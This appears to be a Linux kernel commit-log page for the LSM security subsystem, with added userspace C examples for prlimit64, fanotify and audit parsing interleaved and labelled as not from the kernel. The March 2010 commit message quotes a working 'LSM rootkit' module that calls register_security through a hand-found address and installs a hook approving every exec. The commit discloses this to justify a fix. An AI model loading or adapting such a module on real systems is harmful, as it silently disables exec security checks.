11 Aug, 2010

2 commits

  • * 'writable_limits' of git://decibel.fi.muni.cz/~xslaby/linux:
    unistd: add __NR_prlimit64 syscall numbers
    rlimits: implement prlimit64 syscall
    rlimits: switch more rlimit syscalls to do_prlimit
    rlimits: redo do_setrlimit to more generic do_prlimit
    rlimits: add rlimit64 structure
    rlimits: do security check under task_lock
    rlimits: allow setrlimit to non-current tasks
    rlimits: split sys_setrlimit
    rlimits: selinux, do rlimits changes under task_lock
    rlimits: make sure ->rlim_max never grows in sys_setrlimit
    rlimits: add task_struct to update_rlimit_cpu
    rlimits: security, add task_struct to setrlimit

    Fix up various system call number conflicts. We not only added fanotify
    system calls in the meantime, but asm-generic/unistd.h added a wait4
    along with a range of reserved per-architecture system calls.

    Linus Torvalds
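An added userspace example (not part of the merge above and not from the kernel tree) exercising what this series introduces: the raw prlimit64 syscall reading and setting the limits of a task other than the caller, and the rule that rlim_max may only shrink unless the caller holds CAP_SYS_RESOURCE. It assumes a Linux kernel and glibc new enough to define SYS_prlimit64 (2.6.36 / glibc 2.13); the struct tag prl64 and the helper names are this example's own.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Userspace mirror of the kernel's struct rlimit64 (example's own name):
 * two 64-bit fields whatever the word size of the calling process. */
struct prl64 { uint64_t cur; uint64_t max; };

/* Raw prlimit64(2) as added by this series. pid 0 means the caller;
 * newp may be NULL (read only), oldp may be NULL (no read-back).
 * Returns 0 or -errno. */
static int prlimit64_raw(pid_t pid, int resource,
                         const struct prl64 *newp, struct prl64 *oldp)
{
    if (syscall(SYS_prlimit64, pid, resource, newp, oldp) != 0)
        return -errno;
    return 0;
}

/* Shrink both soft and hard RLIMIT_NOFILE of pid to at most cap.
 * Lowering is the direction the kernel always permits for a task
 * we are allowed to act on. */
static int shrink_nofile(pid_t pid, uint64_t cap)
{
    struct prl64 cur, want;
    int rc = prlimit64_raw(pid, RLIMIT_NOFILE, NULL, &cur);
    if (rc)
        return rc;
    want.cur = cur.cur < cap ? cur.cur : cap;
    want.max = cur.max < cap ? cur.max : cap;
    return prlimit64_raw(pid, RLIMIT_NOFILE, &want, NULL);
}

/* Try to raise the hard RLIMIT_NOFILE of pid by one. Without
 * CAP_SYS_RESOURCE the kernel refuses (rlim_max may never grow through
 * this path) and the result is -EPERM. */
static int grow_nofile_hard(pid_t pid)
{
    struct prl64 cur, want;
    int rc = prlimit64_raw(pid, RLIMIT_NOFILE, NULL, &cur);
    if (rc)
        return rc;
    want.cur = cur.cur;
    want.max = cur.max + 1;
    return prlimit64_raw(pid, RLIMIT_NOFILE, &want, NULL);
}

/* The non-current-task path: park a child, shrink its limit from the
 * parent, read it back through prlimit64, then reap it. Returns the
 * child's hard limit as seen by the parent, or UINT64_MAX on error. */
static uint64_t shrink_child_nofile(uint64_t cap)
{
    struct prl64 seen;
    pid_t child = fork();
    if (child < 0)
        return UINT64_MAX;
    if (child == 0)
        for (;;)
            pause();            /* parked until the parent kills it */
    int rc = shrink_nofile(child, cap);
    if (rc == 0)
        rc = prlimit64_raw(child, RLIMIT_NOFILE, NULL, &seen);
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);
    return rc == 0 ? seen.max : UINT64_MAX;
}

int main(void)
{
    struct prl64 me;
    if (prlimit64_raw(0, RLIMIT_NOFILE, NULL, &me) == 0)
        printf("self: soft=%llu hard=%llu\n",
               (unsigned long long)me.cur, (unsigned long long)me.max);
    printf("child hard limit after shrink to 64: %llu\n",
           (unsigned long long)shrink_child_nofile(64));
    printf("raising own hard limit: %s\n", strerror(-grow_nofile_hard(0)));
    return 0;
}
```

Run unprivileged, the last line reports Operation not permitted; with CAP_SYS_RESOURCE it succeeds unless the hard limit already sits at fs.nr_open, which the kernel refuses to exceed for anyone. Shrinking the child's limit from the parent works either way, because parent and child share uid/gid, which is the id match the kernel requires before acting on a foreign task.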
     
  • * 'for-linus' of git://git.infradead.org/users/eparis/notify: (132 commits)
    fanotify: use both marks when possible
    fsnotify: pass both the vfsmount mark and inode mark
    fsnotify: walk the inode and vfsmount lists simultaneously
    fsnotify: rework ignored mark flushing
    fsnotify: remove global fsnotify groups lists
    fsnotify: remove group->mask
    fsnotify: remove the global masks
    fsnotify: cleanup should_send_event
    fanotify: use the mark in handler functions
    audit: use the mark in handler functions
    dnotify: use the mark in handler functions
    inotify: use the mark in handler functions
    fsnotify: send fsnotify_mark to groups in event handling functions
    fsnotify: Exchange list heads instead of moving elements
    fsnotify: srcu to protect read side of inode and vfsmount locks
    fsnotify: use an explicit flag to indicate fsnotify_destroy_mark has been called
    fsnotify: use _rcu functions for mark list traversal
    fsnotify: place marks on object in order of group memory address
    vfs/fsnotify: fsnotify_close can delay the final work in fput
    fsnotify: store struct file not struct path
    ...

    Fix up trivial delete/modify conflict in fs/notify/inotify/inotify.c.

    Linus Torvalds
     

02 Aug, 2010

1 commit

  • When commit be6d3e56a6b9b3a4ee44a0685e39e595073c6f0d "introduce new LSM hooks
    where vfsmount is available." was proposed, regarding security_path_truncate(),
    only the "struct file *" argument (which AppArmor wanted to use) was removed.
    But the length and time_attrs arguments are used by neither TOMOYO nor AppArmor.
    Thus, let's remove these arguments.

    Signed-off-by: Tetsuo Handa
    Acked-by: Nick Piggin
    Signed-off-by: James Morris

    Tetsuo Handa
     

28 Jul, 2010

1 commit

  • Introduce a new fsnotify hook, fsnotify_perm(), which is called from the
    security code. This hook is used to allow fsnotify groups to make access
    control decisions about events on the system. We also must change the
    generic fsnotify function to return an error code if we intend these hooks
    to be in any way useful.

    Signed-off-by: Eric Paris

    Eric Paris
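fsnotify_perm() is what lets an fsnotify group veto an access, and the userspace face of that (pulled in by the fanotify merge higher up on this page) is a fanotify listener in FAN_CLASS_CONTENT that must answer every FAN_OPEN_PERM event. Below is an added example of such a listener; it is not code from the merge or from the kernel tree. The quarantine directory, the policy and the helper names are this example's own assumptions. The event loop needs CAP_SYS_ADMIN, but the decision and response-building helpers are pure and can be exercised without it.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/fanotify.h>
#include <unistd.h>

/* Policy for this example (an assumption, not anything from the kernel
 * tree): deny opens of files under this directory, allow everything else. */
#define QUARANTINE "/tmp/quarantine/"

/* Verdict for a FAN_OPEN_PERM event on path. */
static unsigned int decide_open(const char *path)
{
    if (strncmp(path, QUARANTINE, sizeof(QUARANTINE) - 1) == 0)
        return FAN_DENY;
    return FAN_ALLOW;
}

/* Resolve the file behind an event fd via /proc/self/fd/N. 0 or -errno. */
static int path_of_fd(int fd, char *buf, size_t sz)
{
    char link[64];
    snprintf(link, sizeof(link), "/proc/self/fd/%d", fd);
    ssize_t n = readlink(link, buf, sz - 1);
    if (n < 0)
        return -errno;
    buf[n] = '\0';
    return 0;
}

/* Fill in the reply the kernel expects for a permission event: the fd it
 * handed us plus FAN_ALLOW or FAN_DENY. Returns that verdict, or 0 when the
 * event is a plain notification that takes no reply. */
static unsigned int answer_event(const struct fanotify_event_metadata *md,
                                 const char *path, struct fanotify_response *out)
{
    if (!(md->mask & (FAN_OPEN_PERM | FAN_ACCESS_PERM)))
        return 0;
    out->fd = md->fd;
    out->response = (md->mask & FAN_OPEN_PERM) ? decide_open(path) : FAN_ALLOW;
    return out->response;
}

/* Event loop. FAN_CLASS_CONTENT puts the group in the class allowed to
 * receive permission events; FAN_OPEN_PERM on the mount makes every open
 * there block until this process writes a fanotify_response. Each
 * permission event must be answered or the opener stays blocked.
 * Needs CAP_SYS_ADMIN; returns -errno if the kernel refuses. */
static int run(const char *mount_point)
{
    static char buf[4096] __attribute__((aligned(8)));
    int fan = fanotify_init(FAN_CLASS_CONTENT | FAN_CLOEXEC, O_RDONLY);
    if (fan < 0)
        return -errno;
    if (fanotify_mark(fan, FAN_MARK_ADD | FAN_MARK_MOUNT, FAN_OPEN_PERM,
                      AT_FDCWD, mount_point) < 0) {
        int e = -errno;
        close(fan);
        return e;
    }
    for (;;) {
        ssize_t len = read(fan, buf, sizeof(buf));
        if (len <= 0)
            break;
        struct fanotify_event_metadata *md = (struct fanotify_event_metadata *)buf;
        while (FAN_EVENT_OK(md, len)) {
            char path[PATH_MAX] = "?";
            struct fanotify_response resp;
            if (md->fd >= 0)
                path_of_fd(md->fd, path, sizeof(path));
            if (answer_event(md, path, &resp)) {
                if (write(fan, &resp, sizeof(resp)) < 0)
                    perror("fanotify response");
                printf("%s open of %s by pid %d\n",
                       resp.response == FAN_DENY ? "denied" : "allowed",
                       path, md->pid);
            }
            if (md->fd >= 0)
                close(md->fd);   /* the event fd pins the file until closed */
            md = FAN_EVENT_NEXT(md, len);
        }
    }
    close(fan);
    return 0;
}

int main(int argc, char **argv)
{
    int rc = run(argc > 1 ? argv[1] : "/");
    if (rc)
        fprintf(stderr, "fanotify: %s\n", strerror(-rc));
    return rc ? 1 : 0;
}
```

Run as root on a mount point, then try to open a file under /tmp/quarantine/ from another shell: the open fails with EPERM and the listener logs it. Closing every event fd matters as much as answering: each one holds the target file open in the listener.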
     

16 Jul, 2010

1 commit


17 May, 2010

1 commit


12 Apr, 2010

13 commits


09 Mar, 2010

1 commit


03 Mar, 2010

1 commit

  • The LSM framework doesn't allow loading a security module at runtime; it must be loaded at boot time.
    But in security/security.c:

        int register_security(struct security_operations *ops)
        {
            ...
            if (security_ops != &default_security_ops)
                return -EAGAIN;
            ...
        }

    If security_ops == &default_security_ops, it is possible to register a security module. If SELinux is enabled,
    other security modules can't register, but if SELinux is disabled at boot time, security_ops is set to
    default_security_ops, and LSM allows other kernel modules to use register_security() to register an untrusted
    security module. For example:

    Disable SELinux at boot time (selinux=0).

        /* Header names restored here; the bracket-stripped list on the page
         * does not say exactly which seven the author used. */
        #include <linux/kernel.h>
        #include <linux/init.h>
        #include <linux/module.h>
        #include <linux/security.h>
        #include <linux/binfmts.h>
        #include <linux/fs.h>
        #include <linux/sched.h>

        MODULE_LICENSE("GPL");
        MODULE_AUTHOR("wzt");

        extern int register_security(struct security_operations *ops);
        int (*new_register_security)(struct security_operations *ops);

        /* Replacement hook: approves every exec without checking anything. */
        int rootkit_bprm_check_security(struct linux_binprm *bprm)
        {
            return 0;
        }

        struct security_operations rootkit_ops = {
            .bprm_check_security = rootkit_bprm_check_security,
        };

        static int rootkit_init(void)
        {
            printk("Load LSM rootkit module.\n");

            /* The author resolves the address by hand from the running kernel
             * (cat /proc/kallsyms | grep register_security); the value is
             * specific to that kernel build. */
            new_register_security =
                (int (*)(struct security_operations *))0xc0756689;
            if (new_register_security(&rootkit_ops)) {
                printk("Can't register rootkit module.\n");
                return 0;
            }
            printk("Register rootkit module ok.\n");

            return 0;
        }

        static void rootkit_exit(void)
        {
            printk("Unload LSM rootkit module.\n");
        }

        module_init(rootkit_init);
        module_exit(rootkit_exit);

    Signed-off-by: Zhitong Wang
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

01 Mar, 2010

1 commit


24 Feb, 2010

1 commit

  • Enhance the security framework to support resetting the active security
    module. This eliminates the need for direct use of the security_ops and
    default_security_ops variables outside of security.c, so make security_ops
    and default_security_ops static. Also remove the secondary_ops variable as
    a cleanup since there is no use for that. secondary_ops was originally used by
    SELinux to call the "secondary" security module (capability or dummy),
    but that was replaced by direct calls to capability and the only
    remaining use is to save and restore the original security ops pointer
    value if SELinux is disabled by early userspace based on /etc/selinux/config.
    Further, if we support this directly in the security framework, then we can
    just use &default_security_ops for this purpose since that is now available.

    Signed-off-by: Zhitong Wang
    Acked-by: Stephen Smalley
    Signed-off-by: James Morris

    wzt.wzt@gmail.com
     

07 Feb, 2010

1 commit


04 Feb, 2010

1 commit

  • This allows the LSM to distinguish between syslog functions originating
    from /proc/kmsg access and direct syscalls. By default, the commoncaps
    will now no longer require CAP_SYS_ADMIN to read an opened /proc/kmsg
    file descriptor. For example the kernel syslog reader can now drop
    privileges after opening /proc/kmsg, instead of staying privileged with
    CAP_SYS_ADMIN. MAC systems that implement security_syslog have unchanged
    behavior.

    Signed-off-by: Kees Cook
    Acked-by: Serge Hallyn
    Acked-by: John Johansen
    Signed-off-by: James Morris

    Kees Cook
     

15 Jan, 2010

1 commit

  • Currently, the getsecurity and setsecurity operations return zero for
    kernel private inodes, where xattrs are not available directly to
    userspace.

    This confuses some applications, and does not conform to the
    man page for getxattr(2) etc., which state that these syscalls
    should return ENOTSUP if xattrs are not supported or disabled.

    Note that in the listsecurity case, we still need to return zero
    as we don't know which other xattr handlers may be active.

    For discussion of userland confusion, see:
    http://www.mail-archive.com/bug-coreutils@gnu.org/msg17988.html

    This patch corrects the error returns so that ENOTSUP is reported
    to userspace as required.

    Signed-off-by: James Morris
    Acked-by: Stephen Smalley
    Acked-by: Serge Hallyn

    James Morris
     

08 Dec, 2009

1 commit


10 Nov, 2009

1 commit

  • For SELinux to do better filtering in userspace we send the name of the
    module along with the AVC denial when a program is denied module_request.

    Example output:

    type=SYSCALL msg=audit(11/03/2009 10:59:43.510:9) : arch=x86_64 syscall=write success=yes exit=2 a0=3 a1=7fc28c0d56c0 a2=2 a3=7fffca0d7440 items=0 ppid=1727 pid=1729 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=rpc.nfsd exe=/usr/sbin/rpc.nfsd subj=system_u:system_r:nfsd_t:s0 key=(null)
    type=AVC msg=audit(11/03/2009 10:59:43.510:9) : avc: denied { module_request } for pid=1729 comm=rpc.nfsd kmod="net-pf-10" scontext=system_u:system_r:nfsd_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=system

    Signed-off-by: Eric Paris
    Signed-off-by: James Morris

    Eric Paris
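As an added example (not part of the commit above), a small parser of the kind a detection pipeline would run over audit lines: it pulls key=value fields out of an AVC record, handling both quoted values such as kmod="net-pf-10" and bare ones such as tclass=system, and flags denied module_request events together with the alias that was requested. net-pf-10 is the alias the kernel asks for when a socket() call names protocol family 10 (AF_INET6) and no handler is registered yet. The sample records are the two lines shown above, copied into a constructed array; the function names are this example's own.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Copy the value of key= from an audit record into out. Handles quoted
 * values (kmod="net-pf-10") and bare ones (tclass=system). The key must
 * start the record or follow a space, so "uid" does not match inside
 * "auid" or "euid". Returns true if the key was present. */
static bool audit_field(const char *rec, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    const char *p = rec;

    while ((p = strstr(p, key)) != NULL) {
        if ((p == rec || p[-1] == ' ') && p[klen] == '=') {
            const char *v = p + klen + 1, *end;
            if (*v == '"') {
                v++;
                end = strchr(v, '"');
            } else {
                end = strchr(v, ' ');
            }
            if (end == NULL)
                end = v + strlen(v);
            size_t n = (size_t)(end - v);
            if (n >= outsz)
                n = outsz - 1;
            memcpy(out, v, n);
            out[n] = '\0';
            return true;
        }
        p += klen;
    }
    return false;
}

/* True when rec is an AVC record denying module_request, i.e. a confined
 * domain tried to make the kernel load a module through request_module().
 * On a match, kmod receives the alias that was requested. */
static bool is_module_request_denial(const char *rec, char *kmod, size_t kmodsz)
{
    char perms[128];
    const char *b, *e;
    size_t n;

    if (strstr(rec, "type=AVC") == NULL || strstr(rec, "avc: denied") == NULL)
        return false;
    /* The permission set is printed between "{ " and " }". */
    b = strstr(rec, "{ ");
    e = b ? strstr(b, " }") : NULL;
    if (b == NULL || e == NULL)
        return false;
    n = (size_t)(e - (b + 2));
    if (n >= sizeof(perms))
        n = sizeof(perms) - 1;
    memcpy(perms, b + 2, n);
    perms[n] = '\0';
    if (strstr(perms, "module_request") == NULL)
        return false;
    return audit_field(rec, "kmod", kmod, kmodsz);
}

/* Count module_request denials in a batch of records. */
static int count_module_request_denials(const char *const *recs, size_t nrecs)
{
    char kmod[64];
    int hits = 0;
    for (size_t i = 0; i < nrecs; i++)
        if (is_module_request_denial(recs[i], kmod, sizeof(kmod)))
            hits++;
    return hits;
}

/* Constructed sample: the two records from the commit message above. */
static const char *const SAMPLE[] = {
    "type=SYSCALL msg=audit(11/03/2009 10:59:43.510:9) : arch=x86_64 syscall=write success=yes exit=2 a0=3 a1=7fc28c0d56c0 a2=2 a3=7fffca0d7440 items=0 ppid=1727 pid=1729 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=rpc.nfsd exe=/usr/sbin/rpc.nfsd subj=system_u:system_r:nfsd_t:s0 key=(null)",
    "type=AVC msg=audit(11/03/2009 10:59:43.510:9) : avc: denied { module_request } for pid=1729 comm=rpc.nfsd kmod=\"net-pf-10\" scontext=system_u:system_r:nfsd_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=system",
};
#define NSAMPLE (sizeof(SAMPLE) / sizeof(SAMPLE[0]))

int main(void)
{
    char kmod[64], comm[64], scon[128];
    for (size_t i = 0; i < NSAMPLE; i++) {
        if (!is_module_request_denial(SAMPLE[i], kmod, sizeof(kmod)))
            continue;
        audit_field(SAMPLE[i], "comm", comm, sizeof(comm));
        audit_field(SAMPLE[i], "scontext", scon, sizeof(scon));
        printf("%s (%s) was denied loading module alias %s\n", comm, scon, kmod);
    }
    return 0;
}
```

The SYSCALL and AVC records share the msg=audit(...) serial, which is how a consumer joins them when it needs the exe= or auid= fields from the syscall side; this example only needs the AVC side.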
     

09 Nov, 2009

1 commit

  • The LSM currently requires setting a kernel parameter at boot to select
    a specific LSM. This adds a config option that allows specifying a default
    LSM that is used unless overridden with the security= kernel parameter.
    If the config option is not set the current behavior of first LSM
    to register is used.

    Signed-off-by: John Johansen
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    John Johansen
     

25 Oct, 2009

1 commit


12 Oct, 2009

2 commits


10 Sep, 2009

1 commit

  • This patch introduces three new hooks. The inode_getsecctx hook is used to get
    all relevant information from an LSM about an inode. The inode_setsecctx is
    used to set both the in-core and on-disk state for the inode based on a context
    derived from inode_getsecctx. The final hook inode_notifysecctx will notify the
    LSM of a change for the in-core state of the inode in question. These hooks are
    for use in the labeled NFS code and address concerns of how to set security
    on an inode in a multi-xattr LSM. For historical reasons Stephen Smalley's
    explanation of the reason for these hooks is pasted below.

    Quote Stephen Smalley

    inode_setsecctx: Change the security context of an inode. Updates the
    in core security context managed by the security module and invokes the
    fs code as needed (via __vfs_setxattr_noperm) to update any backing
    xattrs that represent the context. Example usage: NFS server invokes
    this hook to change the security context in its incore inode and on the
    backing file system to a value provided by the client on a SETATTR
    operation.

    inode_notifysecctx: Notify the security module of what the security
    context of an inode should be. Initializes the incore security context
    managed by the security module for this inode. Example usage: NFS
    client invokes this hook to initialize the security context in its
    incore inode to the value provided by the server for the file when the
    server returned the file's attributes to the client.

    Signed-off-by: David P. Quigley
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    David P. Quigley
     

02 Sep, 2009

1 commit

  • Add a keyctl to install a process's session keyring onto its parent. This
    replaces the parent's session keyring. Because the COW credential code does
    not permit one process to change another process's credentials directly, the
    change is deferred until userspace next starts executing again. Normally this
    will be after a wait*() syscall.

    To support this, three new security hooks have been provided:
    cred_alloc_blank() to allocate unset security creds, cred_transfer() to fill in
    the blank security creds and key_session_to_parent() - which asks the LSM if
    the process may replace its parent's session keyring.

    The replacement may only happen if the process has the same ownership details
    as its parent, and the process has LINK permission on the session keyring, and
    the session keyring is owned by the process, and the LSM permits it.

    Note that this requires alteration to each architecture's notify_resume path.
    This has been done for all arches barring blackfin, m68k* and xtensa, all of
    which need assembly alteration to support TIF_NOTIFY_RESUME. This allows the
    replacement to be performed at the point the parent process resumes userspace
    execution.

    This allows the userspace AFS pioctl emulation to fully emulate newpag() and
    the VIOCSETTOK and VIOCSETTOK2 pioctls, all of which require the ability to
    alter the parent process's PAG membership. However, since kAFS doesn't use
    PAGs per se, but rather dumps the keys into the session keyring, the session
    keyring of the parent must be replaced if, for example, VIOCSETTOK is passed
    the newpag flag.

    This can be tested with the following program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <keyutils.h>

    /* Kept in case the installed keyutils.h predates this keyctl. */
    #ifndef KEYCTL_SESSION_TO_PARENT
    #define KEYCTL_SESSION_TO_PARENT 18
    #endif

    #define OSERROR(X, S) do { if ((long)(X) == -1) { perror(S); exit(1); } } while(0)

    int main(int argc, char **argv)
    {
        key_serial_t keyring, key;
        long ret;

        /* Join the named session keyring, or create an anonymous one when
         * no name is given. */
        keyring = keyctl_join_session_keyring(argv[1]);
        OSERROR(keyring, "keyctl_join_session_keyring");

        /* Put a user key named 'a' into it so the change is visible. */
        key = add_key("user", "a", "b", 1, keyring);
        OSERROR(key, "add_key");

        /* Ask the kernel to install this session keyring on the parent. */
        ret = keyctl(KEYCTL_SESSION_TO_PARENT);
        OSERROR(ret, "KEYCTL_SESSION_TO_PARENT");

        return 0;
    }

    Compiled and linked with -lkeyutils, you should see something like:

    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: _ses
    355907932 --alswrv 4043 -1 \_ keyring: _uid.4043
    [dhowells@andromeda ~]$ /tmp/newpag
    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: _ses
    1055658746 --alswrv 4043 4043 \_ user: a
    [dhowells@andromeda ~]$ /tmp/newpag hello
    [dhowells@andromeda ~]$ keyctl show
    Session Keyring
    -3 --alswrv 4043 4043 keyring: hello
    340417692 --alswrv 4043 4043 \_ user: a

    Where the test program creates a new session keyring, sticks a user key named
    'a' into it and then installs it on its parent.

    Signed-off-by: David Howells
    Signed-off-by: James Morris

    David Howells
     

01 Sep, 2009

1 commit

  • The TUN driver lacks any LSM hooks which makes it difficult for LSM modules,
    such as SELinux, to enforce access controls on network traffic generated by
    TUN users; this is particularly problematic for virtualization apps such as
    QEMU and KVM. This patch adds three new LSM hooks designed to control the
    creation and attachment of TUN devices; the hooks are:

    * security_tun_dev_create()
    Provides access control for the creation of new TUN devices

    * security_tun_dev_post_create()
    Provides the ability to create the necessary socket LSM state for newly
    created TUN devices

    * security_tun_dev_attach()
    Provides access control for attaching to existing, persistent TUN devices
    and the ability to update the TUN device's socket LSM state as necessary

    Signed-off-by: Paul Moore
    Acked-by: Eric Paris
    Acked-by: Serge Hallyn
    Acked-by: David S. Miller
    Signed-off-by: James Morris

    Paul Moore
     

14 Aug, 2009

1 commit

  • Calling request_module() will trigger a userspace upcall which will load a
    new module into the kernel. This can be a dangerous event if the process
    able to trigger request_module() is able to control either the modprobe
    binary or the module binary. This patch adds a new security hook to
    request_module() which can be used by an LSM to control a process's ability
    to call request_module().

    Signed-off-by: Eric Paris
    Acked-by: Serge Hallyn
    Signed-off-by: James Morris

    Eric Paris
     

24 Jun, 2009

1 commit

  • The ->ptrace_may_access() methods are named confusingly - the real
    ptrace_may_access() returns a bool, while these security checks have
    a retval convention.

    Rename it to ptrace_access_check, to reduce the confusion factor.

    [ Impact: cleanup, no code changed ]

    Signed-off-by: Ingo Molnar
    Signed-off-by: James Morris

    Ingo Molnar
     

04 Jun, 2009

1 commit


03 Apr, 2009

1 commit


28 Mar, 2009

1 commit

  • The socket_post_accept() hook is not currently used by any in-tree modules
    and its existence continues to cause problems by confusing people about
    what can be safely accomplished using this hook. If a legitimate need for
    this hook arises in the future it can always be reintroduced.

    Signed-off-by: Paul Moore
    Signed-off-by: James Morris

    Paul Moore